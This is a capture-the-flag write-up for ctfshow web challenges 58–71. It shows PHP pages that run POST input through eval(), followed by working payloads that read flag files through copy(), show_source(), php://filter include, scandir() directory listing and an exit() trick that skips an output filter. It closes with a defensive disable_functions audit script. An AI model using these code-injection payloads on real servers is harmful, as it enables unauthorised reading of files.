ctfshow - Web Basics - Command Execution - 58-71


web58

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

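There is no input filtering, but many functions are disabled: phpinfo(), system() and others are all unavailable. After some testing, the following still work:

1. payload: c=copy('flag.php','1.txt');

2. payload: c=show_source('flag.php');

3. payload: c=echo file_get_contents('flag.php');

4. The include function; the payload is given in the next challenge.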

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=copy('flag.php','1.txt');

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=copy('flag.php','1.txt');

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

4. payload: c=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=include('flag.php');echo $flag;

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

4. payload: c=highlight_file('flag.php');

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=include('flag.php');echo $flag;

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

4. payload: c=highlight_file('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=include('flag.php');echo $flag;

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

4. payload: c=highlight_file('flag.php');

5. payload: c=include('flag.php');var_dump(get_defined_vars());

web64-65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

1. payload: c=include('flag.php');echo $flag;

2. payload: c=show_source('flag.php');

3. payload: c=include('php://filter/convert.base64-encode/resource=flag.php'); then base64-decode the output

4. payload: c=highlight_file('flag.php');

5. payload: c=include('flag.php');var_dump(get_defined_vars());

web66-67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="秀秀得了,这次不在这里";

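This time show_source() is additionally disabled, but the other four methods are unaffected. After submitting them, what comes back is not the flag (the $flag string shown above says it is not here this time), so it is presumably in another directory.

c=print_r(scandir('.')); lists the current directory and shows nothing extra, so list the root directory next: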

Array
(
    [0] => .
    [1] => ..
    [2] => .dockerenv
    [3] => bin
    [4] => dev
    [5] => etc
    [6] => flag.txt
    [7] => home
    [8] => lib
    [9] => media
    [10] => mnt
    [11] => opt
    [12] => proc
    [13] => root
    [14] => run
    [15] => sbin
    [16] => srv
    [17] => sys
    [18] => tmp
    [19] => usr
    [20] => var
)

flag.txt is found; from here it is the same as before.

1. payload: c=include('/flag.txt');echo $flag;

2. payload: c=include('php://filter/convert.base64-encode/resource=/flag.txt'); then base64-decode the output

3. payload: c=highlight_file('/flag.txt');

4. payload: c=include('/flag.txt');var_dump(get_defined_vars());

web68-70

Opening the page just shows:

Parse error: syntax error, unexpected end of file in /var/www/html/index.php(17) : eval()'d code on line 1

Judging from the previous pages, the source should be the same as before. print_r() is now disabled as well, so we try var_dump instead.

array(21) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(10) ".dockerenv"
  [3]=>
  string(3) "bin"
  [4]=>
  string(3) "dev"
  [5]=>
  string(3) "etc"
  [6]=>
  string(8) "flag.txt"
  [7]=>
  string(4) "home"
  [8]=>
  string(3) "lib"
  [9]=>
  string(5) "media"
  [10]=>
  string(3) "mnt"
  [11]=>
  string(3) "opt"
  [12]=>
  string(4) "proc"
  [13]=>
  string(4) "root"
  [14]=>
  string(3) "run"
  [15]=>
  string(4) "sbin"
  [16]=>
  string(3) "srv"
  [17]=>
  string(3) "sys"
  [18]=>
  string(3) "tmp"
  [19]=>
  string(3) "usr"
  [20]=>
  string(3) "var"
}

1. payload: c=include('/flag.txt');echo $flag;

2. payload: c=include('php://filter/convert.base64-encode/resource=/flag.txt'); then base64-decode the output

3. payload: c=include('/flag.txt');var_dump(get_defined_vars());

web71

Opening the page shows only:

Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14

Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24
你要上天吗?

Source code from the attachment:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
ini_set('display_errors', 0);
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗?

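Same as above, except that the directory has to be enumerated with a short loop, and exit(); is appended at the end. exit() ends the script before the ob_get_contents() and preg_replace() lines run, so the output is sent without the letters and digits being replaced by ?.

Directory enumeration payload: c=for($i=0;$i<=40;$i%2B%2B){echo scandir('/')[$i].'<br>';}exit();

1. payload: c=include('/flag.txt');echo $flag;exit();

2. payload: c=include('php://filter/convert.base64-encode/resource=/flag.txt');exit(); then base64-decode the output

3. payload: c=include('/flag.txt');var_dump(get_defined_vars());exit();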
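
Across web58 to web71 more names are added to disable_functions, yet the payload lists barely change. As an added example (not code from this write-up or from ctfshow), the Python script below audits a php.ini fragment against the primitives used on this page and separates what the denylist blocks from what it cannot reach. The sample config is constructed from the functions the write-up names as disabled, and parse_disable_functions(), audit() and the two name lists are hypothetical names chosen here.

```python
import re

# Primitives used by this page's payloads, in the order they appear.
PRIMITIVES = ["copy", "show_source", "highlight_file", "file_get_contents",
              "include", "scandir", "print_r", "var_dump",
              "get_defined_vars", "echo", "exit"]

# Language constructs: disable_functions only applies to internal functions,
# so listing these names there has no effect.
CONSTRUCTS = {"include", "echo", "exit"}

# Constructed sample, not the challenge's real php.ini: it lists only the
# functions the write-up names as disabled by web71.
SAMPLE_INI = """\
; constructed sample
disable_functions = system,phpinfo,show_source,print_r,highlight_file,error_reporting,ini_set
"""


def parse_disable_functions(ini_text):
    """Return the set of names in the last disable_functions assignment."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {n.strip() for n in value.split(",") if n.strip()}
    return disabled


def audit(ini_text):
    """Sort each primitive into blocked / callable / construct."""
    disabled = parse_disable_functions(ini_text)
    report = {"blocked": [], "callable": [], "construct": []}
    for name in PRIMITIVES:
        if name in CONSTRUCTS:
            report["construct"].append(name)
        elif name in disabled:
            report["blocked"].append(name)
        else:
            report["callable"].append(name)
    return report


if __name__ == "__main__":
    for kind, names in audit(SAMPLE_INI).items():
        print(f"{kind:<9} {', '.join(names)}")
```

The construct row is why the include payloads survive every round: no disable_functions entry affects them. The effective controls are not passing request input to eval() and restricting reachable paths with open_basedir, which also applies to include.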


Author: Rolemee
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee as the source when reposting!